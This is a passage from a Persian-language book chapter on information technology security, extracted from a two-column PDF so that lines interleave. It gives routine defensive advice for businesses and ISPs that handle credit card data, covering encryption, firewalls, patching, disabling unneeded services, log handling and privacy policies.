ﺑــﺮﺍﻱ ﺭﻣﺰﮔــﺬﺍﺭ ﹺ • ﻗﺮﺍﺭ ﺩﻫﻴﺪ.
ﺍﻋﺘﺒﺎﺭﻱ ﺑﺎﻳﺪ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﭘﻴﺸﺮﻓﺘﺔ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻗﺎﻋﺪﺓ .۲۵ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺗـﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘـﻲ ﺧـﻮﺩ ﺭﺍ ﺑـﺎ ﺭﻭﺷـﻬﺎ ﻭ
ﺑﺨﺶ ﺳﻮﻡ
ﭘﺴﺮﺍﻥ ،٢٠٢ﻭ ﻣﻚ ﮔﺮﻭﻫﻴﻞ ٢٠٣ﻛﺘﺎﺑﻬﺎﻱ ﺧﻮﺑﻲ ﺩﺭ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﺗﻤـﺎﻣﻲ ﻛﺎﺭﻣﻨـﺪﺍﻥ - •
ﺑﺎﺏ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻣﻨﺘـﺸﺮ ﻛـﺮﺩﻩﺍﻧـﺪ. ﻣﺨﺼﻮﺻﹰﺎ ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ -ﺑﺎﻭﺭ ﺩﺍﺭﻧﺪ ﻛـﻪ ﺍﻣﻨﻴـﺖ
ﻗﻴﻤﺖ ﺍﻳﻦ ﻛﺘﺎﺑﻬﺎ ﺑﺴﺘﻪ ﺑـﻪ ﻣﺤـﻞ ﺯﻧـﺪﮔﻲ ﺷـﻤﺎ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻥ ﺑﺴﻴﺎﺭ ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ.
ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺘﻔﺎﻭﺕ ﺑﺎﺷﺪ ،ﺍﻣﺎ ﺑﻪ ﻫﺮ ﺣﺎﻝ ﺧﺮﻳـﺪ ﺍﮔﺮ ﺍﻃﻼﻋﺎﺗﻲ ﻣﺜﻞ ﺩﺍﺩﻩ ﻫـﺎﻱ ﻛـﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﻭ •
ﻭ ﺍﺳــﺘﻔﺎﺩﺓ ﻣــﺆﺛﺮ ﺍﺯ ﺁﻧﻬــﺎ ﺳــﺮﻣﺎﻳﻪﮔــﺬﺍﺭﻱ ﺑــﺴﻴﺎﺭ ﺩﻳﮕﺮ ﺩﺍﺩﻩﻫﺎﻱ ﻣـﺎﻟﻲ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﺩﻳـﺴﻚ ﺳـﺨﺖ
ﻣﻔﻴﺪﻱ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﺪ. ﺣﺬﻑ ﻣﻲ ﻛﻨﻴﺪ ،ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺁﻥ ﺩﺍﺩﻩ ﺩﻳﮕـﺮ
ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﻗﺎﺑﻞ ﺑﺎﺯﻳﺎﺑﻲ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ .ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ
ﺏ( ﺍﮔﺮ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﻗﺎﺑـﻞ
ﻓﺮﺍﺗﺮ ﺍﺯ ﭘﺎﻙ ﻛﺮﺩﻥ ﺳﺎﺩﺓ ﻓﺎﻳﻠﻬـﺎ ﺍﺳـﺖ .ﭼﻨﺎﻧﭽـﻪ
ﺩﺳﺘﺮﺱ ﺑﺎﺷﺪ:
ﻧﻤﻲﺩﺍﻧﻴﺪ ﻛﻪ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﭼﻄـﻮﺭ ﺑـﺼﻮﺭﺕ ﻛﺎﻣـﻞ ﺍﺯ
ﺗﻤﺎﻡ ﻧﻜﺎﺗﻲ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﻗﺒﻠﻲ ﮔﻔﺘﻪ ﺷـﺪ ،ﺑﻌـﻼﻭﺓ • ﺑﻴﻦ ﺑﺒﺮﻳﺪ ،ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺍﺯ ﺍﻓﺮﺍﺩ ﻣﺘﺨـﺼﺺ
ﻧﻜﺎﺕ ﺯﻳﺮ: ﻛﻤﻚ ﺑﮕﻴﺮﻳﺪ.
ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻧﺼﺐ ﻛﻨﻴﺪ ﺗـﺎ ﻣﻄﻤـﺌﻦ ﺷـﻮﻳﺪ • ﺩﺭ ﻓﻮﺍﺻﻞ ﻣﻨﻈﻢ ﺯﻣـﺎﻧﻲ ﻧـﺴﺨﺔ ﭘـﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ •
ﺗﻨﻬﺎ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﻣﺠﺎﺯ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ ﻛﻨﻴﺪ ﻭ ﺍﺯ ﺍﻳﻤﻨﻲ ﻧﺴﺨﻪﻫﺎﻳﻲ ﻛﻪ ﺣﺎﻭﻱ ﺍﻃﻼﻋـﺎﺕ
ﺭﺍﻳﺎﻧــﻪ ﺩﺳﺘﺮﺳــﻲ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻨﺪ ﻭ ﺍﺯ ﺩﺳﺘﺮﺳــﻲ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﻫﺴﺘﻨﺪ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﻛﻨﻴﺪ.
ﻋﻤﻮﻣﻲ ﺑﻪ ﺁﻥ ﺟﻠﻮﮔﻴﺮﻱ ﺧﻮﺍﻫﺪ ﺷﺪ.
ﺑﺎ ﺍﻧﺘـﺸﺎﺭ ﻳـﻚ "ﺳﻴﺎﺳـﺖ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ" ﺑـﻪ •
ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪﺭﻭﺯ ﺭﺍ ﺭﻭﻱ ﺗﻤـﺎﻡ ﺗﺠﻬﻴـﺰﺍﺕ • ﻛﺎﺭﺑﺮﺍﻥ ﺍﻋﻼﻡ ﻛﻨﻴﺪ ﭼﻪ ﺩﺍﺩﻩ ﻫﺎﻳﻲ ﺭﺍ ﺫﺧﻴـﺮﻩ ﻭ ﺍﺯ
ﺷﺒﻜﻪ )ﻣـﺴﻴﺮﻳﺎﺑﻬﺎ ،ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﺁﺗـﺶ ،ﺳـﻮﺋﻴﭽﻬﺎ ،ﻭ (... ﺁﻥ ﺑﺮﺍﻱ ﭼـﻪ ﻣﻨﻈـﻮﺭﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻧﻤﺎﻳﻴـﺪ ،ﻭ
ﻧﺼﺐ ﻛﻨﻴﺪ. ﭼﮕﻮﻧﻪ ﺁﻧﺮﺍ ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﺪ )ﻣﻲﺗﻮﺍﻧﻴﺪ
ﭼﮕﻮﻧﮕﻲ ﺣﻔﺎﻇﺖ ﺭﺍ ﺑﺼﻮﺭﺕ ﻏﻴﺮﻣﺴﺘﻘﻴﻢ ﻭ ﻣـﺒﻬﻢ ﺗﻮﺿـﻴﺢ
ﺑﺮﺍﻱ ﻛﻠﻴﺔ ﭘﻴﺎﻣﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﻛـﻪ •
ﺩﻫﻴﺪ(.
ﺭﻭﻱ ﺧﻂ ﻣﻨﺘﻘﻞ ﻣﻲﺷﻮﻧﺪ ﺍﺯ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳـﺘﻔﺎﺩﻩ
ﻛﻨﻴﺪ. ﺍﮔﺮ ﺑﺮﺍﻱ ﺑﺮﺩﺍﺷﺖ ﺍﺯ ﻛﺎﺭﺗﻬـﺎﻱ ﺍﻋﺘﺒـﺎﺭﻱ ،ﺍﻋﺘﺒـﺎﺭ •
ﺁﻧﻬﺎ ﺭﺍ ﺑﺼﻮﺭﺕ ﺑﺮﺧﻂ ﺍﺭﺯﻳﺎﺑﻲ ﻣﻲﻛﻨﻴـﺪ ﺍﻃﻤﻴﻨـﺎﻥ
ﻫﻤــﺔ ﺧــﺪﻣﺎﺕ ﺷــﺒﻜﻪﺍﻱ ﻏﻴﺮﺿــﺮﻭﺭﻱ )ﻣﺜــﻞ •
ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ ،Webﻓﺮﺍﺧــﻮﺍﻧﻲ ﺗــﺎﺑﻊ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ،٢٠٤ﻭ ﻲ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺧﻂ ﺍﺭﺗﺒـﺎﻃ ﹺ
ﭘﺮﻭﺗﻜﻞ ﺍﻧﺘﻘﺎﻝ ﻓﺎﻳﻞ (٢٠٥ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ. ﺍﻣﻨﻴﺖ ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳـﺖ .ﺍﮔـﺮ ﺍﺯ ﻳـﻚ ﻣـﻮﺩﻡ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﻴـﺪ ،ﻣﻄﻤـﺌﻦ ﺷـﻮﻳﻦ ﻛـﻪ ﺍﻣﻜـﺎﻥ
ﺝ( ﺍﮔﺮ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺍﺯ ﻃﺮﻳـﻖ ﺷـﺒﻜﺔ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺍﺯ ﺑﻴﺮﻭﻥ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ.
ﺟﻬﺎﻧﻲ ﻭﺏ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ: ﺍﮔﺮ ﺳﻮﺍﺑﻘﻲ ﺷﺎﻣﻞ ﺩﺍﺩﻩﻫﺎﻱ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺭﺍ ﺑـﻪ •
ﺗﻤﺎﻡ ﻧﻜﺎﺗﻲ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﻗﺒﻠﻲ ﮔﻔﺘﻪ ﺷـﺪ ،ﺑﻌـﻼﻭﺓ • ﭼﺎﭖ ﻣﻲﺭﺳﺎﻧﻴﺪ ،ﺍﺯ ﻟﺤﺎﻅ ﻓﻴﺰﻳﻜﻲ ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﻣﻨﻴﺖ
ﻧﻜﺎﺕ ﺯﻳﺮ: ﺁﻧﻬﺎ ﺭﺍ ﺗﺄﻣﻴﻦ ﻛﻨﻴﺪ ﻭ ﺑﻼﻓﺎﺻﻠﻪ ﭘﺲ ﺍﺯ ﺍﻳﻨﻜﻪ ﺩﻳﮕﺮ
ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻧﺒﻮﺩﻧﺪ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎ ﺩﺳﺘﮕﺎﻩ ﻛﺎﻏﺬﺧﺮﺩﻛﻦ ﺍﺯ
ﺍﻃﻼﻋــﺎﺕ ﻣﺮﺑــﻮﻁ ﺑــﻪ ﻛــﺎﺭﺕ ﺍﻋﺘﺒــﺎﺭﻱ ﺭﺍ ﺩﺭ •
ﺑﻴﻦ ﺑﺒﺮﻳﺪ.
ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺎﺑـﻞ ﺩﺳﺘﺮﺳـﻲ
ﻫﺴﺘﻨﺪ ﻗـﺮﺍﺭ ﻧﺪﻫﻴـﺪ .ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﺭﻭﻱ ﺩﺳـﺘﮕﺎﻫﻲ ﺍﺯ ﻣﻨﺎﺑﻊ ﻣﻌﺘﺒﺮ ،ﭼﻨﺪ ﻛﺘﺎﺏ ﺑﻪﺭﻭﺯ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴـﺖ •
ﺩﻳﮕﺮ ﻭ ﭘﺸﺖ ﺩﻳﻮﺍﺭﺓ ﺁﺗـﺶ ﻗـﺮﺍﺭ ﺩﻫﻴـﺪ ﻭ ﺑـﺮﺍﻱ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺨﺮﻳﺪ ،ﺁﻧﻬﺎ ﺭﺍ ﻣـﻮﺭﺩ ﻣﻄﺎﻟﻌـﻪ
ﻗــﺮﺍﺭ ﺩﻫﻴــﺪ ،ﻭ ﺗﻮﺻــﻴﻪﻫﺎﻳــﺸﺎﻥ ﺭﺍ ﺩﻧﺒــﺎﻝ ﻛﻨﻴــﺪ.
202 John Wiley and Sons ﺍﻧﺘــﺸﺎﺭﺍﺕ ﺍﻭﺭﻳﻠــﻲ ﻭ ﺷــﺮﻛﺎ ،٢٠١ﺟــﺎﻥ ﻭﺍﻳﻠــﻲ ﻭ
203 Osborne / McGraw-Hill
204 )Remote Procedure Call (RPC
205 )File Transfer Protocol (FTP 201 O'Reilly & Associates
٢٠٩ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺑﺪﻭﻥ ﺍﺟﺎﺯﺓ ﺻﺮﻳﺢ ﻛـﺎﺭﺑﺮ ،ﺁﺩﺭﺱ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ • ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻥ ﺍﺯ ﻓﺮﺍﺧـﻮﺍﻧﻲ ﺗـﺎﺑﻊ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻳـﺎ
ﺍﻃﻼﻋﺎﺕ ﺷﺨـﺼﻲ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺳﺎﻳﺮ ﺭﻭﺷﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺑﻪ ﻫﻤـﺮﺍﻩ ﻳـﻚ ﺳﻴـﺴﺘﻢ
ﺩﻳﮕﺮ ﻧﮕﺬﺍﺭﻳﺪ. ﻏﺮﺑﺎﻝﺳﺎﺯ ﺧﻮﺏ ﺩﺭ ﺳﻄﺢ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﺍﺳـﺘﻔﺎﺩﻩ
ﻛﻨﻴﺪ.
ﻫﺮﮔﺎﻩ ﻧﺎﻣﻪﺍﻱ ﺑﺮﺍﻱ ﺍﻓـﺮﺍﺩ ﺍﺭﺳـﺎﻝ ﻣـﻲﻛﻨﻴـﺪ ،ﺑـﻪ ﺁﻧﻬـﺎ •
ﺗﻮﺿﻴﺢ ﺩﻫﻴﺪ ﻛﻪ ﺁﺩﺭﺱ ﭘﺴﺘﻲ ﺁﻧﻬـﺎ ﺭﺍ ﭼﮕﻮﻧـﻪ ﺑﺪﺳـﺖ ﺗﻤﺎﻡ ﺗﺮﺍﻛﻨـﺸﻬﺎﻱ ﺭﻭﻱ ﺷـﺒﻜﻪ ﺭﺍ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ •
ﺁﻭﺭﺩﻩﺍﻳــﺪ ﻭ ﺁﻧﻬــﺎ ﭼﮕﻮﻧــﻪ ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﺁﺩﺭﺱ ﺧــﻮﺩ ﺭﺍ ﺍﺯ ﻗﻮﻳﺘﺮﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻣﻮﺟﻮﺩ )ﺩﺭﺻـﻮﺭﺕ ﺍﻣﻜـﺎﻥ ﺑـﺎ
ﻓﻬﺮﺳﺖ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﮔﺎﻥ ﻧﺎﻣﻪﻫﺎﻱ ﺷﻤﺎ ﺣﺬﻑ ﻛﻨﻨﺪ. ﻛﻠﻴﺪ ۱۲۸ﺑﻴﺘﻲ( ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻤﺎﻳﻴﺪ.
ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺩﺳﺘﺮﺱ ﻋﻤﻮﻡ ﻗـﺮﺍﺭ ﻧﺪﻫﻴـﺪ ﻭ • ﺍﻃﻤﻴﻨــﺎﻥ ﺣﺎﺻــﻞ ﻛﻨﻴــﺪ ﻛــﻪ ﺍﻃﻼﻋــﺎﺕ ﻛــﺎﺭﺕ •
ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﺁﻧﻬﺎ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﺪ. ﺍﻋﺘﺒﺎﺭﻱ ﻛﻪ ﻣﻮﻗﺘﹰﺎ ﺩﺭ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﺓ ﻭﺏ ﺫﺧﻴـﺮﻩ
ﺷﺪﻩ ﺍﺳﺖ ،ﺑﻼﻓﺎﺻﻠﻪ ﭘﺲ ﺍﺯ ﺍﺗﻤﺎﻡ ﺗﺮﺍﻛﻨﺶ ﭘـﺎﻙ
ﺯﻣﺎﻧﻴﻜﻪ ﺩﻳﮕﺮ ﻧﻴﺎﺯﻱ ﺑﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﺛﺒـﺖ ﻧﺪﺍﺭﻳـﺪ ،ﺁﻧﻬـﺎ ﺭﺍ •
ﻣﻲﺷﻮﺩ.
ﭘﺎﻙ ﻛﻨﻴﺪ.
ﺍﮔﺮ ﻻﺯﻡ ﺍﺳﺖ ﻓﺎﻳﻠﻬـﺎﻱ ﺛﺒـﺖ ﺑـﺮﺍﻱ ﻣـﺪﺕ ﺯﻳـﺎﺩﻱ ﺍﺯ • ﺍﮔﺮ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺣﺘﻤـ ﹰﺎ ﺑﺎﻳـﺪ ﺭﻭﻱ ﺩ(
ﺑﺨﺶ ﺳﻮﻡ
ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳـﻲ ﺑﺎﺷـﻨﺪ ،ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ ﺭﺍﻳﺎﻧﺔ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ:
ﺑﺎﻋﺚ ﺷﻨﺎﺳﺎﻳﻲ ﺍﺷﺨﺎﺹ ﻣﻲﺷـﻮﺩ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﺁﻥ ﺣـﺬﻑ
ﺗﻤﺎﻣﻲ ﻣﻮﺍﺭﺩ ﺑﺎﻻ ﺭﺍ ﺍﻋﻤﺎﻝ ﻛﻨﻴﺪ ،ﺍﻣﺎ ﺑﺎ ﻫﻮﺷـﻴﺎﺭﻱ •
ﻛﻨﻴﺪ.
ﺑﻴﺸﺘﺮﻱ ﻧﺴﺒﺖ ﺑﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘـﻲ .ﺁﻥ ﺭﺍﻳﺎﻧـﻪ،
ﻧﺎﻗﻀﺎﻥ ﺳﻴﺎﺳﺖ ﺣﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﺭﺍ ﺗﺄﺩﻳـﺐ ﻳـﺎ ﺍﺧـﺮﺍﺝ • ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﺁﻥ ،ﻭ ﮔﺰﺍﺭﺷـﻬﺎﻱ ﻓﻌﺎﻟﻴﺘﻬـﺎ ﺑﺎﻳـﺪ ﺑـﻪ
ﻧﻤﺎﻳﻴﺪ. ﺩﻗﺖ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺩﺍﺋﻤﻲ ﺑﺎﺷﻨﺪ.
ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻴـﺪ ﻛـﻪ ﻫﻤـﺔ ﺧـﺪﻣﺎﺕ ﻏﻴﺮﺿـﺮﻭﺭﻱ )ﻣﺜـﻞ • ﺍﻣﻨﻴﺘﻲ )ﮔﺰﺍﺭﺵ ﺑﻪ ﻋﻮﺍﻣﻞ ﺩﺍﺧﻠـﻲ ﺳـﺎﺯﻣﺎﻥ ،ﺑـﻪ ISPﻫـﺎ ،ﻭ ﻧﻴـﺰ
،ftp ،icq ،fingerﻛﺎﻣﭙﺎﻳﻠﺮﻫـﺎ ﻭ (...ﺭﻭﻱ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﻗﺎﺑـﻞ ﻣﻘﺎﻣﺎﺕ ﻣﺴﺌﻮﻝ(
ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ،ﻏﻴﺮﻓﻌﺎﻝ ﺷﺪﻩﺍﻧﺪ. ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺧـﻮﺩ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻛﻨﻴـﺪ )ﺁﻳـﺎ ﺗﻨﻬـﺎ •
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻫﻤﺔ ﺩﺳـﺘﮕﺎﻫﻬﺎ -ﺧـﺼﻮﺻﹰﺎ ﺁﻧﻬـﺎﻳﻲ • ﻣﺴﺌﻮﻟﻴﺖ ﺣﻔﻆ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺷﻤﺎﺳﺖ ،ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﺍ ﺗﺎ ﭼﻪ ﻣﺪﺕ
ﻛــﻪ ﻗﺎﺑــﻞ ﺍﺗــﺼﺎﻝ ﺑــﻪ ﺍﻳﻨﺘﺮﻧــﺖ ﻫــﺴﺘﻨﺪ -ﺑــﺎ ﺍﻋﻤــﺎﻝ ﺑﺎﻳﺪ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ ،ﻭ .(...
ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻪ ﻣﻲﺷﻮﻧﺪ. ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺗﺪﻭﻳﻦ ﻛﻨﻴﺪ ﺩﺭ ﺧﺼﻮﺹ ﭼﮕﻮﻧﮕﻲ ﻭﺍﻛـﻨﺶ •
ﻳﻚ ﺳﻴﺴﺘﻢ ﻛﻨﺘﺮﻝ ﻣﺪﺍﻭﻡ ﺷﺒﻜﻪ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﺗـﺎ ﺑﺘﻮﺍﻧﻴـﺪ • ﺑﻪ ﻫﺸﺪﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ،ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﻣﺸﺘﺮﻳﺎﻥISP ،ﻫـﺎﻱ
ﻣــﺸﻜﻼﺗﻲ ﺍﺯ ﻗﺒﻴــﻞ ﺣﻤــﻼﺕ ﺗﺨﺮﻳــﺐ ﺳــﺮﻭﻳﺲ ﻭ ﻫﻤﺘﺎ ،ﺍﺭﺍﺋﻪ ﺩﻫﻨﺪﮔﺎﻥ ﻋﻤﺪﺓ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ،ﻭ ﺳﺎﻳﺮ ﻛـﺎﺭﺑﺮﺍﻥ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻋﻤﺪﺓ ﻭﻳﺮﻭﺳـﻬﺎ ﻭ ﻫﺮﺯﻧﺎﻣـﻪﻫـﺎ ﺭﺍ ﺗـﺸﺨﻴﺺ ﺍﻳﻨﺘﺮﻧﺖ.
ﺩﻫﻴﺪ .ﺍﻳﻦ ﻧﻴﺎﺯﻣﻨﺪ ﺁﻥ ﺍﺳﺖ ﻛـﻪ ﻗـﺎﺩﺭ ﺑﺎﺷـﻴﺪ ﺍﻟﮕﻮﻫـﺎﻱ ﺁﮔﺎﻩ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺸﺘﺮﻳﺎﻥ ﺧﺪﻣﺎﺕ ﺷـﻤﺎ ﺑـﻪ •
ﻃﺒﻴﻌﻲ ﺗﺮﺍﻓﻴﻚ ﺷﺒﻜﺔ ﺧﻮﺩ ﺭﺍ ﺩﺭﻙ ﻛﻨﻴﺪ. ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺑﻴﺮﻭﻧــﻲ ﺣﻤﻠــﻪ ﻛﻨﻨــﺪ .ﻣــﻲﺗﻮﺍﻧﻴــﺪ ﺑــﺮﺍﻱ
ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻗﺎﺑﻠﻴﺖ ﻛﻨﺘﺮﻝ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﺗﺎ ﺑﻬﺘﺮ ﺑﺘﻮﺍﻧﻴـﺪ • ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﮔﺰﺍﺭﺷﺎﺕ ﺳﺎﻳﺮ ISPﻫﺎ ﻣﺒﻨﻲ ﺑـﺮ ﺩﺳـﺖ
ﻣﻬﺎﺟﻤﺎﻥ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ )ﻣﺎﺷﻴﻨﻬﺎﻱ ﻣﻴﺰﺑﺎﻥ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺩﺍﺷﺘﻦ ﻣﺸﺘﺮﻳﺎﻥ ﺷﻤﺎ ﺩﺭ ﺣﻤﻼﺕ ،ﻳﻚ ﺳﻴﺎﺳﺖ ﺗـﺪﻭﻳﻦ
ﻭ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﻓﺮﺍﻣﻮﺵ ﻧﻜﻨﻴﺪ(. ﻧﻤﺎﻳﻴﺪ.
ﻭﻳﺮﻭﺱﻳﺎﺏﻫﺎ ﺭﺍ ﺩﺭ ﻫﺮ ﺟﺎﻳﻲ ﻛﻪ ﻭﺭﻭﺩ ﻳﺎ ﺧﺮﻭﺝ ﭘـﺴﺖ • ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺩﺭ ﺳﻄﺢ ISPﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻭﻳﺮﻭﺱﻳﺎﺏ •
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ ﻧﺼﺐ ﻛﻨﻴﺪ. ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ،ﻣﻤﻜﻦ ﺍﺳـﺖ ﺗـﺼﻤﻴﻢ ﺑﮕﻴﺮﻳـﺪ ﺑـﺮﺍﻱ
ﻓﺮﺳﺘﻨﺪﺓ ﻧﺎﻣﻪﻫﺎﻱ ﺁﻟﻮﺩﻩ ﻫـﺸﺪﺍﺭﻫﺎﻳﻲ ﻣﺒﻨـﻲ ﺑـﺮ "ﻋـﺪﻡ
ﺑﺎ ﺗﻬﻴﻪ ﺿﺪﻭﻳﺮﻭﺳﻬﺎﻱ ﺭﺍﻳﮕﺎﻥ ﻳﺎ ﺍﺭﺯﺍﻥﻗﻴﻤﺖ ،ﻣـﺸﺘﺮﻳﺎﻥ •
ﺍﻧﺘﻘﺎﻝ ﻧﺎﻣﻪ ﺑﺪﻟﻴﻞ ﺁﻟﻮﺩﮔﻲ ﺑﻪ ﻭﻳﺮﻭﺱ" ﺍﺭﺳﺎﻝ ﻛﻨﻴﺪ.
